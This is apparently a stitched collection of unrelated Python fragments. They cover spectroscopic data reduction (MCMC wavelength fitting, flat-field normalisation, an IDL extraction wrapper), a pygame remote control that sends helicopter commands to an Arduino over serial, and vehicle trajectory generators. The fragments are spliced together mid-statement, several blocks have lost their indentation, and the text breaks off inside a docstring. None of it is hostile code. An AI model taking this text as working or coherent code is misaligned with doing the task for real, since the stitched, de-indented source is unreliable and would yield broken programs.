x0n = dx0 * np.arange(nlam) - 1.
#x0n = 2*np.arange(nlam, dtype=float) / (nlam - 1.) - 1
if guess is None:
# Start with a simple linear wavelength solution.
guess = [np.diff(wtemplate).mean() * len(template)/2, np.mean(wtemplate), np.median(template)/np.median(spectrum), 1.]
# Define arguments for use by fitting routines:
fitting_args = (makemodel, x0n, spectrum, wtemplate, template, 1./etemplate**2)
# Try to find an initial best fit:
bestparams = an.fmin(pc.errfunc, guess, args=fitting_args, disp=False)
# Initial fit is likely a local minimum, so explore parameter
# space using an MCMC approach.
ndim = len(guess)
nwalkers = ndim * 50
sampler = emcee.EnsembleSampler(nwalkers, ndim, pc.lnprobfunc, args=fitting_args, threads=nthread)
# Initialize the sampler with various starting positions:
e_params1 = np.vstack((np.array(guess)/10., np.zeros(ndim) + .01)).max(0)
e_params2 = np.vstack((bestparams/10., np.zeros(ndim) + .01)).max(0)
p0 = np.vstack(([guess, bestparams], \
[np.random.normal(guess, e_params1) for ii in xrange(nwalkers/2-1)], \
[np.random.normal(bestparams, e_params2) for ii in xrange(nwalkers/2-1)]))
# Run the sampler for a while:
pos, prob, state = sampler.run_mcmc(p0, 300) # Burn-in
bestparams = sampler.flatchain[np.nonzero(sampler.lnprobability.ravel()==sampler.lnprobability.ravel().max())[0][0]]
# Optimize the latest set of best parameters.
bestparams = an.fmin(pc.errfunc, bestparams, args=fitting_args, disp=False)
dispersionSolution = bestparams[0:-2]
if spectrum_trimmed:
x0n_original = dx0 * np.arange(nlam_s) - 1.
wavelengths = np.polyval(dispersionSolution, x0n_original)
else:
wavelengths = np.polyval(dispersionSolution, x0n)
return dispersionSolution, wavelengths, bestparams
def makemodel(params, xvec, specvec, wtemplate):
    """Helper function for :func:`wavelengthMatch`: generate a scaled,
    interpolative model of the template.

    The last two entries of ``params`` are a flux scale and offset; the
    leading entries are polynomial coefficients mapping ``xvec`` onto
    wavelength.  The spectrum is interpolated onto the template's
    wavelength grid (zero outside its range) and linearly rescaled.
    """
    scale, offset = params[-2::]
    wavelength_coefs = params[0:-2]
    warped_wavelengths = np.polyval(wavelength_coefs, xvec)
    resampled = np.interp(wtemplate, warped_wavelengths, specvec, left=0, right=0)
    return offset + scale * resampled
def normalizeSpecFlat(flatdat, nspec=1, minsep=50, median_width=51, readnoise=40, badpixelmask=None, traces=None):
    """Trace and normalize a spectroscopic flat field frame.
    :INPUTS:
      flatdat : 2D NumPy array
        Master, unnormalized flat frame: assumed to be measured in
        photoelectrons (for computing uncertainties).
      nspec : int
        Number of spectral orders to find and normalize
      minsep : int
        Minimum separation, in pixels, between spectral orders that
        will be found.
      median_width : int
        Width of median-filter kernel used to compute the low-
        frequency profile of each order.
      readnoise : scalar
        Detector read noise, in electrons. For computing uncertainties.
      badpixelmask : 2D NumPy array
        bad pixel mask: 1 at bad pixel locations, 0 elsewhere.
      traces : 2D NumPy Array
        (nord, pord) shaped numpy array representing the polynomial
        coefficients for each order (suitable for use with
        np.polyval), as produced by :func:`traceorders`
    :RETURNS:
      masterflat : 2D NumPy array
        Same shape as `flatdat`: the flat divided by each order's smoothed
        profile inside the traced orders, and 1.0 everywhere else
        (including at bad pixels).
    :NOTES:
      `flatdat` is modified in place: non-positive and masked pixels are
      set to 1 before normalization.
    """
    # 2012-04-28 06:22 IJMC: Created
    # 2012-07-24 21:04 IJMC: Now, as a final step, all bad indices are set to unity.
    # 2014-12-17 20:07 IJMC: Added 'traces' option
    import analysis as an
    from scipy import signal
    if badpixelmask is None:
        badpixelmask = np.zeros(flatdat.shape, bool)
    # Enforce positivity and de-weight negative flux values:
    # (bad pixels get huge uncertainties and unit flux, so they carry
    # essentially zero weight downstream)
    e_flatdat = np.sqrt(flatdat + readnoise**2)
    badindices = ((flatdat<=0) + badpixelmask).nonzero()
    e_flatdat[badindices] = flatdat[badindices] * 1e9
    flatdat[badindices] = 1.
    # Find spectral orders, using derivatives (will probably fail if
    # spec. overlaps the edge!):
    ordvec = an.meanr(flatdat, axis=1, nsigma=3)
    filtvec = signal.medfilt(ordvec, 9)
    # dvec1 peaks mark rising order edges; dvec2 peaks mark falling edges.
    dvec1 = np.diff(filtvec)
    dvec2 = -np.diff(filtvec)
    dvec1[dvec1<0] = 0.
    dvec2[dvec2<0] = 0.
    x1 = np.arange(dvec1.size)
    available1 = np.ones(dvec1.size, dtype=bool)
    available2 = np.ones(dvec1.size, dtype=bool)
    pos1 = []
    pos2 = []
    # Greedily pick the nspec strongest edges, excluding a +/- minsep
    # window around each edge already taken:
    for ii in range(nspec):
        thisx1 = x1[dvec1==dvec1[available1].max()][0]
        available1[np.abs(x1 - thisx1) < minsep] = False
        pos1.append(thisx1)
        thisx2 = x1[dvec2==dvec2[available2].max()][0]
        available2[np.abs(x1 - thisx2) < minsep] = False
        pos2.append(thisx2)
    # NOTE: zip(...) passed straight to np.array and xrange below are
    # Python-2 idioms; under Python 3 this would need list(zip(...))/range.
    limits = np.array(zip(np.sort(pos1), np.sort(pos2)))
    # Generate and normalize the spectral traces:
    masterflat = np.ones(flatdat.shape, dtype=float)
    if traces is not None:
        nx = flatdat.shape[1]
        xvec = np.arange(nx)
        ymat = np.tile(np.arange(flatdat.shape[0]), (nx, 1)).T
    for ii in range(nspec):
        if traces is None:
            # Straight (row-aligned) order: one shared profile per order.
            profvec = np.median(flatdat[limits[ii,0]:limits[ii,1], :], axis=0)
            # NOTE(review): e_profvec is computed but never used below --
            # candidate for removal.
            e_profvec = np.sqrt(an.wmean(flatdat[limits[ii,0]:limits[ii,1], :], 1./e_flatdat[limits[ii,0]:limits[ii,1], :]**2, axis=0) / np.diff(limits[ii]))[0]
            e_profvec[e_profvec <= 0] = profvec.max()*1e9
            smooth_prof = signal.medfilt(profvec, median_width)
            masterflat[limits[ii,0]:limits[ii,1], :] = flatdat[limits[ii,0]:limits[ii,1], :] / smooth_prof
        else:
            # Curved order: follow the polynomial trace column by column.
            traceloc = np.polyval(traces[ii], xvec)
            limind = (limits[:,1] > traceloc.mean()).nonzero()[0][0]
            order_ind_2d = ((ymat - traceloc) > (limits[limind,0] - traceloc.mean())) * ((ymat - traceloc) < (limits[limind,1] - traceloc.mean()))
            profvec = np.array([np.median(flatdat[order_ind_2d[:,jj], jj]) for jj in xrange(nx)])
            smooth_prof = signal.medfilt(profvec, median_width)
            for jj in xrange(nx):
                masterflat[order_ind_2d[:,jj],jj] = flatdat[order_ind_2d[:,jj],jj] / smooth_prof[jj]
    # Ideally, we would do some sort of weighted fitting here. Instead,
    # for now, just take a running median:
    masterflat[badindices] = 1.
    return masterflat
def optspecextr_idl(frame, gain, readnoise, x1, x2, idlexec, clobber=True, tempframefn='tempframe.fits', specfn='tempspec.fits', scriptfn='temp_specextract.pro', IDLoptions="adjfunc='adjgauss', adjoptions={center:1,centerfit:1,centerdeg:3}, bgdeg=3", inmask=None):
"""Run optimal spectral extraction in IDL; pass results to Python.
:INPUTS:
frame : str
filename, or 2D Numpy Array, or list of filenames containing
frames from which spectra will be extracted. This should be
in units of ADU (not electrons) for the noise properties to
come out properly.
Also, the spectral trace must run vertically across the frame.
gain : scalar
Detector gain, in electrons / ADU
readnoise : scalar
Detector read noise, in electrons
x1, x2 : ints, or lists of ints
Start and stop indices of the spectral trace across the frame.
If multiple frames are input and a single x1/x2 is input, the
same value will be used for each frame. Note however that
multiple x1/x2 can also be input (one for each frame).
idlexec : str
Path to the IDL executable. OPTSPECEXTR.PRO and its
associated files must be in your IDL path. If set to None,
then it will be set to: os.popen('which idl').read().strip()
:OPTIONS:
clobber : bool
Whether to overwrite files when writing input data to TEMPFRAMFN.
tempframefn : str
If input 'frame' is an array, it will be written to this
filename in order to pass it to IDL.
specfn : str
IDL will write the spectral data to this filename in order to
pass it back to Python.
scriptfn : str
Filename in which the short IDL script will be written.
IDLoptions : str
Options to pass to OPTSPECEXTR.PRO. For example:
"adjfunc='adjgauss', adjoptions={center:1,centerfit:1,centerdeg:3}, bgdeg=3"
Note that this Python code will break if you _don't_ trace
the spectrum (adjoptions, etc.); this is an area for future
work if I ever use a spectrograph with straight traces.
inmask : None or str
Name of the good pixel mask for OPTSPECEXTR.PRO. Equal to 1
for good pixels, and 0 for bad pixels.
:OUTPUTS:
For each input frame, a list of four items:
[0] -- Extracted spectrum, ADU per pixel
[1] -- Uncertainty (1 sigma) of extracted spectrum
[2] -- Location of trace (in pixels) across the frame
[3] -- Width of trace across the frame
:NOTES:
Note that this more closely follows Horne et al. than does
:func:`optimalExtract`, and is faster than both that function
and (especially!) :func:`extractSpectralProfiles`. The only
downside (if it is one) is that this function requires IDL.
:TO-DO:
Add options for user input of a variance frame, or of sky variance.
Allow more flexibility (tracing, input/output options, etc.)
:REQUIREMENTS:
IDL
`OPTSPECEXTR <http://physics.ucf.edu/~jh/ast/software.html>`_
"""
# 2012-08-18 16:36 IJMC: created
# 2012-08-19 09:39 IJMC: Added 'inmask' option.
import os
try:
from astropy.io import fits as pyfits
except:
import pyfits
# Put the input frames in the proper format:
if isinstance(frame, np.ndarray):
frameisfilename = False
if frame.ndim==2:
frames = [frame]
elif frame.ndim==1:
print "Input array should be 2D or 3D -- no telling what will happen next!"
else:
frames = frame
else:
frameisfilename = True
if isinstance(frame, str):
frames = [frame]
else:
frames = frame
if not hasattr(x1, '__iter__'):
x1 = [x1] * len(frames)
if not hasattr(x2, | |
# Repository: vivin/syma
#
# Python virtual remote control for Syma S107. This program sends data to the serial port
# when it receives an acknowledgement for more data from the arduino. The UI simulates
# (rather crudely) a throttle stick, and a yaw/pitch stick, along with a trim control.
#
# This script also includes a simple form of flow control. We're rendering the controls at
# 20fps, which means that we would effectively be sending 20 packets a second to the arduino.
# Unfortunately, the arduino can only consume 10 packets every second. Therefore, it is prudent
# to send data only when the arduino needs it. Whenever the arduino needs data, it will send a
# byte through the serial channel that lets the python script know that it can send data. Until
# then, the script will queue up data into a local buffer (pretty much a queue).
#
# Author: <NAME>
# http://vivin.net
#
import pygame
import math
import os
import serial
import struct
from collections import deque
# Define some colors (RGB tuples for pygame drawing)
black = ( 0, 0, 0)
white = ( 255, 255, 255)
blue = ( 50, 50, 255)
green = ( 0, 255, 0)
dkgreen = ( 0, 100, 0)
red = ( 255, 0, 0)
purple = (0xBF,0x0F,0xB5)
brown = (0x55,0x33,0x00)
# Define some constants
# Serial link to the arduino
ARDUINO_SERIAL_PORT = "/dev/ttyACM0"
ARDUINO_SERIAL_BAUD_RATE = 9600
# Geometry of the on-screen yaw/pitch joystick (pixels)
CONTROL_RADIUS = 83
JOYSTICK_RADIUS = 20
CONTROL_X = 550
CONTROL_Y = 250
# Desktop position of the application window
WINDOW_X = 400
WINDOW_Y = 200
# Geometry and value range of the throttle slider
THROTTLE_X = 175
THROTTLE_Y = 188
THROTTLE_WIDTH = 34
THROTTLE_HEIGHT = 129
THROTTLE_MAX = 127
THROTTLE_MIN = 0
# Geometry and value range of the trim slider
TRIM_X = 280
TRIM_Y = 320
TRIM_MAX = 126
TRIM_MIN = 0
TRIM_HEIGHT = 34
TRIM_WIDTH = 129
TRIM_MARKER_HEIGHT = 44
TRIM_MARKER_WIDTH = 4
# Offset that maps joystick displacement (+/- 63 px) onto the 0..126 range
TRANSLATION_FACTOR = 63
# Text placement for the title and the live value read-out
TITLE_X = 400
TITLE_Y = 10
VALUES_X = 400
VALUES_Y = 30
# Keyboard bindings
THROTTLE_UP_KEY = pygame.K_w
THROTTLE_DOWN_KEY = pygame.K_s
TRIM_LEFT_KEY = pygame.K_a
TRIM_RIGHT_KEY = pygame.K_d
# Control channel identifiers
YAW = 0
PITCH = 1
THROTTLE = 2
TRIM = 3
# Neutral ("centered") value for each channel
ZERO_YAW = 63
ZERO_PITCH = 63
ZERO_THROTTLE = 0
ZERO_TRIM = 63
# Function to draw the background
def draw_background(screen):
    """Wipe the screen to the background colour before redrawing the UI."""
    screen.fill(white)
# Function to calculate the distance between two points
def distance(x1, y1, x2, y2):
    """Return the Euclidean distance between the points (x1, y1) and (x2, y2)."""
    # math.hypot is the stdlib idiom for this and is robust against
    # intermediate overflow for large deltas.
    return math.hypot(x2 - x1, y2 - y1)
# Function to limit the x and y coordinate of the joystick. We call this method if the distance between the current x and y coordinate of the mouse
# and the center of the control is greater than the difference between CONTROL_RADIUS and JOYSTICK_RADIUS. The limited x and y coordinate is the
# intersection of the line between the current x and y coordinate and the center of the control and the circle with radius CONTROL_RADIUS - JOYSTICK_RADIUS
def limit(x, y):
    """Clamp (x, y) onto the circle of radius CONTROL_RADIUS - JOYSTICK_RADIUS
    centered on the control, along the ray from the control center to (x, y)."""
    dy = y - CONTROL_Y
    dx = x - CONTROL_X
    # NOTE(review): these signs depend on the (constant, positive) control
    # center, so they are always +1 with the current constants; it looks
    # like they were perhaps meant to depend on dx/dy -- preserved as-is.
    sign_x = -1 if CONTROL_X < 0 else 1
    sign_y = -1 if CONTROL_Y < 0 else 1
    reach = CONTROL_RADIUS - JOYSTICK_RADIUS
    norm = math.sqrt(math.pow(dy, 2) + math.pow(dx, 2))
    limit_x = sign_x * (reach * dx) / norm
    limit_y = sign_y * (reach * dy) / norm
    return (limit_x + CONTROL_X, limit_y + CONTROL_Y)
# Open a serial connection to arduino in non-blocking mode (timeout=0 means
# read() returns immediately with whatever bytes are available)
connection = serial.Serial(ARDUINO_SERIAL_PORT, ARDUINO_SERIAL_BAUD_RATE, timeout = 0);
# Position the window
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (WINDOW_X, WINDOW_Y)
pygame.init()
# Set the height and width of the screen
size = [800, 600]
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Syma S107 Virtual Remote Control")
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
# Set the initial position of the mouse to be on top of our joystick
pygame.mouse.set_pos(CONTROL_X, CONTROL_Y)
# A boolean that states whether the joystick is active. This happens when the user clicks the mousebutton while on the joystick
control_active = False
# These two variables keep track of the position of the joystick. Let's initialize these to be at the center of the control circle
currX = CONTROL_X
currY = CONTROL_Y
# Keeps track of the current throttle value
throttle = 0
# Keeps track of the current trim value (63 == centered, matching ZERO_TRIM)
trim = 63
# Keep track of the previous values for these attributes. We want to send data only if something has changed
previousYaw = 0
previousPitch = 0
previousThrottle = 0
previousTrim = 0
# The python script sends 20 packets every second (because we're rendering 20 frames a second). However, the arduino is configured
# to send data to the helicopter at 10 packets every second. Essentially we're sending data twice as fast as the arduino can consume
# it. To prevent loss of data, we do two things. First, we only send data if any of the values (yaw, pitch, throttle, trim) have
# changed, and second, we only send data if the arduino asks for it. When the arduino is ready to accept data, it sends a byte
# (129) through the serial channel. This lets the python script know that it can send data.
READY_TO_ACCEPT_ACK = 129
# Since we're sending data to the arduino almost twice as fast as it can consume it, let's buffer our data until we actually need
# to send it. To do this, we'll use a queue.
commandValues = deque([]);
while done == False:
draw_background(screen)
# Get mouse-button states
(button1, button2, button3) = pygame.mouse.get_pressed();
# Get keyboard-button states
states = pygame.key.get_pressed();
if states[THROTTLE_UP_KEY]:
throttle += 1
if throttle > THROTTLE_MAX:
throttle = THROTTLE_MAX
if states[THROTTLE_DOWN_KEY]:
throttle -= 1
if throttle < THROTTLE_MIN:
throttle = THROTTLE_MIN
if states[TRIM_LEFT_KEY]:
trim += 1
if trim > TRIM_MAX:
trim = TRIM_MAX
if states[TRIM_RIGHT_KEY]:
trim -= 1
if trim < TRIM_MIN:
trim = TRIM_MIN
# Get the current mouse position. This returns the position
# as a list of two numbers.
pos = pygame.mouse.get_pos()
# Fetch the x and y out of the list,
x = pos[0]
y = pos[1]
# Calculate the distance between current mouse coordinates and the center of the control circle
dist = distance(x, y, CONTROL_X, CONTROL_Y)
# If the control isn't already active and we're clicking the left mouse-button, it means that we
# might be clicking the joystick
if not control_active and button1:
# The distance is lesser than the joystick radius, which means that clicking on the joystick
if dist < JOYSTICK_RADIUS:
control_active = True
# Otherwise, it means that the left mouse-button is not clicked, so let's reset the position of the
# joystick to the center of the control
elif not button1:
control_active = False
(currX, currY) = (CONTROL_X, CONTROL_Y)
# If the control is active, it means that we are pressing the left mouse-button and moving the joystick.
if control_active:
# If the distance between the current mouse coordinates is greater than CONTROL_RADIUS - JOYSTICK_RADIUS
# it means that we're trying to push the joystick out of the control circle. So let's limit the x and y
# coordinate
if dist > (CONTROL_RADIUS - JOYSTICK_RADIUS):
(currX, currY) = limit(x, y)
else:
(currX, currY) = (x, y)
# Draw control and joystick
pygame.draw.circle(screen, black, [CONTROL_X, CONTROL_Y], CONTROL_RADIUS, 1)
pygame.draw.circle(screen, black, [int(round(currX)), int(round(currY))], JOYSTICK_RADIUS, 0)
# Draw throttle control with throttle level
pygame.draw.rect(screen, green, [THROTTLE_X + 1, (THROTTLE_Y + THROTTLE_HEIGHT) - throttle - 1, THROTTLE_WIDTH - 2, throttle], 0)
pygame.draw.rect(screen, black, [THROTTLE_X, THROTTLE_Y, THROTTLE_WIDTH, THROTTLE_HEIGHT], 1)
# Draw trim control
pygame.draw.rect(screen, black, [TRIM_X, TRIM_Y, TRIM_WIDTH, TRIM_HEIGHT], 1)
pygame.draw.rect(screen, black, [TRIM_X + (TRIM_WIDTH / 2) - (TRIM_MARKER_WIDTH / 2) - trim + TRANSLATION_FACTOR, TRIM_Y - ((TRIM_MARKER_HEIGHT - TRIM_HEIGHT) / 2), TRIM_MARKER_WIDTH, TRIM_MARKER_HEIGHT], 0)
# Calculate yaw and pitch values
yaw = int(round(CONTROL_X - currX)) + TRANSLATION_FACTOR
pitch = TRANSLATION_FACTOR - int(round(CONTROL_Y - currY))
# Create a font
font = pygame.font.Font(None, 22)
# Render the title
title = font.render("Syma S107 Virtual Remote Control" , True, black)
titleRect = title.get_rect();
titleRect.centerx = TITLE_X
titleRect.centery = TITLE_Y
# Render the yaw, pitch, trottle, and trim values
values = font.render("Yaw: " + str(yaw) + " Pitch: " + str(pitch) + " Throttle: " + str(throttle) + " Trim: " + str(trim), True, blue);
valuesRect = values.get_rect();
valuesRect.centerx = VALUES_X
valuesRect.centery = VALUES_Y
# Blit the text
screen.blit(title, titleRect)
screen.blit(values, valuesRect)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# Write values to arduino only if they have | |
# [rad / m]
max_turn_length = min(length,
min(200.0,
length if turning_rate == 0.0 else \
(120 * pi / 180.0) / fabs(turning_rate)))
turn_length = random.uniform(1, max_turn_length)
# print('seg: ', turning_rate, turn_length, max_turn_length)
segment_length = turn_length \
if turning_rate == 0 else \
min(turn_length, (2 * pi / 180.0) / fabs(turning_rate))
# segment_length = 1.0
# segment_angle = (turning_rate + random.gauss(0.0, difficulty * 5.0 * (pi / 180))) * segment_length
segment_angle = turning_rate * segment_length
# print(segment_angle, segment_length, turning_rate, turn_length)
angle += segment_angle
delta = Vec2d(segment_length, 0.0)
delta.rotate(angle)
last = waypoints[-1]
next = last[0] + delta
waypoints.append((next, target_speed))
distance += segment_length
turn_length -= segment_length
return waypoints, False
def curriculum_curved_trajectory_factory(
        min_speed=5,
        max_speed=45,
        speed_step=5.0,
        num_turning_rate_steps=5,
        min_turn_rate_multiplier=.5,
        max_turn_rate_multiplier=1.5,
        num_turns_per_step=2,
        min_turn_arc=60 * pi / 180,
        max_turn_arc=120 * pi / 180,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
    """Build a trajectory generator that sweeps speed and turning rate.

    The returned callable produces a list of (waypoint, target_speed)
    pairs: for every speed level it walks through
    ``num_turning_rate_steps`` turning-rate bins and emits
    ``num_turns_per_step`` randomized curved turns per bin, approximating
    each turn with short straight segments of at most 5 degrees of arc.
    """
    def curriculum_curved_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
        total_length = 0.0
        heading = 0.0
        speed_levels = 1 + int(ceil((max_speed - min_speed) / speed_step))
        # Seed the path with a short straight run at the minimum speed.
        waypoints = [(Vec2d(0, 0), min_speed), (Vec2d(10.0, 0), min_speed)]
        for level in range(speed_levels):
            step_speed = level * speed_step + min_speed
            # Comfortable turning radius for this speed; formula per
            # http://dotapp7.dot.state.mn.us/edms/download?docId=1062356
            comfortable_radius = 1.0 * ((step_speed * 3.6) ** 2) / (127 * (0.0 + .12))
            comfortable_rate = 1.0 / comfortable_radius
            lo_rate = min_turn_rate_multiplier * comfortable_rate
            hi_rate = max_turn_rate_multiplier * comfortable_rate
            rate_step = (hi_rate - lo_rate) / num_turning_rate_steps
            for bin_index in range(num_turning_rate_steps):
                bin_rate = lo_rate + bin_index * rate_step
                for _ in range(num_turns_per_step):
                    # NOTE: the order of these random draws is part of the
                    # observable behavior -- do not reorder them.
                    target_speed = step_speed + random.uniform(0, speed_step)
                    turn_rate = min(hi_rate, bin_rate + random.uniform(0, rate_step))
                    turn_arc = random.uniform(min_turn_arc, max_turn_arc)
                    turn_direction = 1 if bool(random.getrandbits(1)) else -1
                    remaining_arc = turn_arc
                    while remaining_arc > 1e-3:
                        # Approximate the curve with <= 5 degree segments.
                        arc = min(remaining_arc, 5.0 * pi / 180.0)
                        remaining_arc -= arc
                        segment_length = arc / turn_rate
                        heading += turn_direction * arc
                        step_vec = Vec2d(segment_length, 0.0)
                        step_vec.rotate(heading)
                        waypoints.append((waypoints[-1][0] + step_vec, target_speed))
                        total_length += segment_length
        return waypoints, False
    return curriculum_curved_trajectory_generator
def curriculum_angled_trajectory_factory(
        min_speed=5,
        max_speed=45,
        speed_step=4.0,
        num_turning_rate_steps=4,
        min_turn_rate_multiplier=0,
        max_turn_rate_multiplier=1.5,
        # num_turns_per_step=2,
        step_length=300,
        transition_length=10,
        min_turn_arc=60 * pi / 180,
        max_turn_arc=120 * pi / 180,
        random_seed=2,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
    """Build a reproducible curriculum path of straights and angled turns.

    The waypoint list is generated once, at factory-call time, using a
    private ``random.Random(random_seed)`` stream so repeated factory calls
    with the same arguments produce the same path.  The returned generator
    just hands back that precomputed list.

    The path sweeps speed bands from ``min_speed`` to ``max_speed`` in
    ``speed_step`` increments; within each band it sweeps
    ``num_turning_rate_steps`` turn rates derived from a speed-dependent
    turning radius.  Each ``step_length`` segment begins with a short
    straight transition and then follows an arc discretized in ~2-degree
    slices, with Gaussian jitter applied to both heading and target speed.

    The generator's signature is ``(process) -> (waypoints, flag)`` where
    ``waypoints`` is a list of ``(Vec2d position, target_speed)`` pairs and
    the flag is always False.
    """
    r = random.Random(random_seed)
    # length = 0.0
    angle = 0.0
    num_speed_steps = 1 + int(ceil((max_speed - min_speed) / speed_step))
    previous_speed = min_speed
    # start with a straight line
    # waypoints = [(Vec2d(0, 0), min_speed), (Vec2d(transition_length, 0), min_speed)]
    waypoints = [(Vec2d(0, 0), previous_speed)]
    # print('num_speed_steps', num_speed_steps)
    for s in range(num_speed_steps):
        min_step_speed = s * speed_step + min_speed
        # Turning radius as a function of speed (km/h), adapted from:
        # http://dotapp7.dot.state.mn.us/edms/download?docId=1062356
        mid_turning_radius = 1.0 * ((min_step_speed * 3.6) ** 2) / (127 * (0.0 + .12))
        mid_turning_rate = 1.0 / mid_turning_radius
        min_turning_rate = min_turn_rate_multiplier * mid_turning_rate
        max_turning_rate = max_turn_rate_multiplier * mid_turning_rate
        # num_turning_steps = 1 + int(ceil((min_turning_rate - max_turning_rate) / turning_rate_step))
        # print('num_turning_steps', num_turning_rate_steps)
        turning_rate_step = (max_turning_rate - min_turning_rate) / num_turning_rate_steps
        for t in range(num_turning_rate_steps):
            base_turn_rate = min_turning_rate + t * turning_rate_step
            # for i in range(num_turns_per_step):
            remaining_length = step_length
            while remaining_length > 0:
                target_speed = min_step_speed + r.uniform(0, speed_step)
                # straightaway at beginning of each turn
                line_length = min(transition_length, remaining_length)
                delta = Vec2d(line_length, 0.0)
                delta.rotate(angle)
                next = waypoints[-1][0] + delta
                # Speed ramp: the straight gets the mean of old and new targets.
                waypoints.append((next, (target_speed + previous_speed) / 2))
                remaining_length -= line_length
                turn_rate = min(max_turning_rate, base_turn_rate + r.uniform(0, turning_rate_step))
                turn_arc = r.uniform(min_turn_arc, max_turn_arc)
                turn_direction = 1 if bool(r.getrandbits(1)) else -1
                # turn_length = turn_rate / turn_arc
                remaining_arc = turn_arc
                # Walk the arc in ~2 degree slices, jittering heading and speed
                # per slice, until either the arc or the segment budget runs out.
                while remaining_arc > 1e-3 and remaining_length > 0:
                    # arc = 0.0
                    # max_arc = 5.0 * pi / 180.0
                    # min_arc = 1.0 * pi / 180.0
                    # if remaining_arc >= max_arc:
                    #     arc = r.uniform(min_arc, max_arc)
                    # else:
                    #     arc = remaining_arc
                    arc = min(remaining_arc, 2.0 * pi / 180.0)
                    remaining_arc -= arc
                    line_length = min(remaining_length, arc / turn_rate)
                    line_angle = turn_direction * arc
                    # if arc >= remaining_arc:
                    line_angle += r.gauss(0.0, 2.0 * pi / 180.0)
                    target_speed = clamp(target_speed + r.gauss(0.0, .5), min_speed, max_speed)
                    angle += line_angle
                    delta = Vec2d(line_length, 0.0)
                    delta.rotate(angle)
                    next = waypoints[-1][0] + delta
                    waypoints.append((next, target_speed))
                    remaining_length -= line_length
                    previous_speed = target_speed
    # Plotting curriculum path for jul14_2020_experiments:
    # import matplotlib.pyplot as plt
    # import numpy as np
    # point_locations = np.array([[point[0].x, point[0].y] for point in waypoints])
    # speeds = np.array([elem[1] for elem in waypoints])
    #
    # plt.figure()
    # plt.plot(point_locations[:, 0], point_locations[:, 1], color = 'gray', label = 'path')
    # plt.fill_between(x = point_locations[:, 0], y1 = point_locations[:, 1] - speeds,
    #                  y2 = point_locations[:, 1] + speeds, color = 'gray', label = '2 * target speed',
    #                  alpha = 0.7)
    # plt.scatter(point_locations[0, 0], point_locations[0, 1], color='b', marker='o', label='start')
    # plt.scatter(point_locations[-1, 0], point_locations[-1, 1], color='r', marker='o', label='end')
    # plt.legend()
    # plt.xlabel('X [m]', fontsize = 14)
    # plt.ylabel('Y [m]', fontsize = 14)
    # plt.title("RL Training Path", fontsize = 24)
    # plt.savefig('curriculum_path.svg', format = 'svg')
    ####
    def curriculum_angled_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
        # The path was precomputed above; False means "trajectory not done".
        return waypoints, False
    return curriculum_angled_trajectory_generator
def lee_2018_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
    """
    Path found in Lee 2018.
    https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0194110

    A straight of ``distance_1`` followed by two joined arcs (radius_1 then
    radius_2), all driven at a constant ``target_speed``.

    Fixes over the previous revision:
    * ``range()`` only accepts integers, so the float-stepped loops raised
      TypeError; the phases are now computed from an integer index.
    * The first arc's x offset used ``- distance_1``, which jumped the path
      from (distance_1, 0) to (-distance_1, 0); ``+ distance_1`` keeps the
      arc continuous with the straight and with the second arc.
    * Second-arc waypoints were missing their target speed.
    * The function now returns ``(waypoints, False)`` as its signature
      promises, instead of the bare list.
    """
    target_speed: float = 20.
    distance_1: float = 200.
    radius_1: float = 200.
    radius_2: float = 100.
    # Both arcs span a quarter circle sampled every pi/1000 radians.
    num_steps: int = 500
    waypoints: List[Tuple[Vec2d, float]] = [
        (Vec2d(0, 0), target_speed),
        (Vec2d(distance_1, 0), target_speed),
    ]
    # First arc: phase runs from pi/2 down toward 0 (exclusive), starting at
    # (distance_1, 0) and ending at (distance_1 + radius_1, -radius_1).
    for k in range(num_steps):
        phase = pi / 2. - k * (pi / 1000.)
        waypoints.append((Vec2d(radius_1 * cos(phase) + distance_1,
                                radius_1 * sin(phase) - radius_1),
                          target_speed))
    # Second arc: phase runs from pi up toward 3*pi/2 (exclusive); its start
    # point coincides with the end of the first arc.
    for k in range(num_steps):
        phase = pi + k * (pi / 1000.)
        waypoints.append((Vec2d(radius_2 * cos(phase) + distance_1 + radius_1 + radius_2,
                                radius_2 * sin(phase) - radius_1),
                          target_speed))
    return waypoints, False
def sine_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
    """Fixed sine path: 100 samples over 1000 m, amplitude 20 m, two full
    periods, constant 30 m/s target speed.  Always returns done-flag False."""
    speed = 30.
    waypoints = []
    for step in range(100):
        frac = step / 100.0
        point = Vec2d(1000 * frac, 20.0 * sin(2 * frac * 2 * pi))
        waypoints.append((point, speed))
    return waypoints, False
def sine_trajectory_factory(
        length: float = 3000.0,
        amplitude: float = 20,
        wavelength: float = 10.0,
        target_speed: float = 10.0,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
    """Return a generator producing a sine-shaped path of ``length`` metres.

    NOTE(review): the sine term always completes exactly two full periods
    over ``length`` regardless of ``wavelength``; ``wavelength`` only sets
    the sampling density (segment length = wavelength / 2000).  Confirm that
    is the intended behaviour before relying on the parameter name.
    """
    def trajectory_generator(process: 'TrajectoryTrackingProcess'):
        seg_len = wavelength / 2000
        n_segments = ceil(length / seg_len)
        path = []
        for idx in range(n_segments):
            frac = float(idx / n_segments)
            position = Vec2d(length * frac,
                             amplitude * sin(2 * frac * 2 * pi))
            path.append((position, target_speed))
        return path, False
    return trajectory_generator
def carla_json_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
    """
    Build a trajectory from a carla-collect scenario JSON file.

    If ``online`` is True the scenario is fetched from the carla-collect
    GitHub repository; otherwise it is read from a local file of the same
    name.  Segments shorter than three points are skipped, and duplicate
    (x, y) pairs are dropped so the path contains no repeated waypoints.
    All waypoints share a constant target speed of 30.

    Fix: ``json.load`` takes an open file object, not a path string — the
